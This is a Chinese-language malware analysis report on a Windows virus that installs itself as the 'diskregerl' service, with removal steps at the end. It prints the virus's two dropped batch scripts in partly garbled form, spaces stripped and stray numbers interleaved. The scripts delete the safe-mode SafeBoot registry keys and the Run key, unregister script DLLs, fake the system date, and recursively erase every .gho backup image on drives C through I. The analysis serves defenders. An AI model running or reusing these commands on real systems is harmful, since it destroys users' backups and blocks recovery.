文件MD5：e98a4571cf72b798077d12d6c4894629

行为分析：

1、拷贝文件：

C:windowssystem32diskregerl.exe45,056字节

2、无添加启动项举动。

3、释放2个批处理：

内容分别为：

22483

17213

25187

6133

22690

25373

date2004-08-17

19477

time20:00:00

ping127.0.0.1-n5

sc.execreatediskregerlBinPath="C:windowssystem32diskregerl.exe-kills"type=owntype=interactstart=autoDisplayName=diskregerlProgramnot

sc.exedescriptiondiskregerl创建网络连接2

regsvr32.exe/u/sscrrun.dll

regsvr32.exe/u/sshimgvw.dll

regsvr32.exe/u/sitss.dll

regsvr32.exe/u/svbscript.dll

regsvr32.exe/sjscript.dll

reg.exedeleteHKLMSYSTEMControlSet001ControlSafeBootMinimal{4D36E967-E325-11CE-BFC1-08002BE10318}/F

reg.exedeleteHKLMSYSTEMControlSet001ControlSafeBootNetwork{4D36E967-E325-11CE-BFC1-08002BE10318}/F

reg.exedeleteHKLMSYSTEMCurrentControlSetControlSafeBootMinimal{4D36E967-E325-11CE-BFC1-08002BE10318}/F

reg.exedeleteHKLMSYSTEMCurrentControlSetControlSafeBootNetwork{4D36E967-E325-11CE-BFC1-08002BE10318}/F

reg.exedeleteHKLMSoftwareMicrosoftWindowsCurrentVersionRun/F

23413

sc.exestartdiskregerl

del"C:WINDOWSMediaWindowsXP开始.wav"

del"C:WINDOWSMediaWindowsXP信息栏.wav"

del"C:WINDOWSMediaWindowsXP弹出窗口已阻止.wav"

regsvr32.exe/sC:windowssystem32Programnot.dll

ping127.0.0.1-n6

del"C:DocumentsandSettings孤独更可靠桌面oky.exe"/F

22483

17213

date2008-04-02

time08:21:33

del%0

exit

第二个：

25187

6133

226902537319477

2819720092

404

ping127.0.0.1-n16

13539

cmd.exe/cdel/f/s/qc:*.gho

6752

cmd.exe/cdel/f/s/qd:*.gho

31772

cmd.exe/cdel/f/s/qe:*.gho

12028

cmd.exe/cdel/f/s/qf:*.gho

8720

cmd.exe/cdel/f/s/qg:*.gho

10731

cmd.exe/cdel/f/s/qh:*.gho

8840

cmd.exe/cdel/f/s/qi:*.gho

11736

regsvr32.exe/sC:windowssystem32Programnot.dll

del%0

exit

4、连接网站，刷流量：

http://www.xerty.cn/^^/300center.htm

5、另外该病毒可能恶意锁定IE主页，不过未实现。

解决方法：

1、重启计算机。

2、删除文件：

C:windowssystem32diskregerl.exe

3、如果重启后病毒无法删除，请下载冰刃(该软件可到down.45it.com下载)，结束其进程。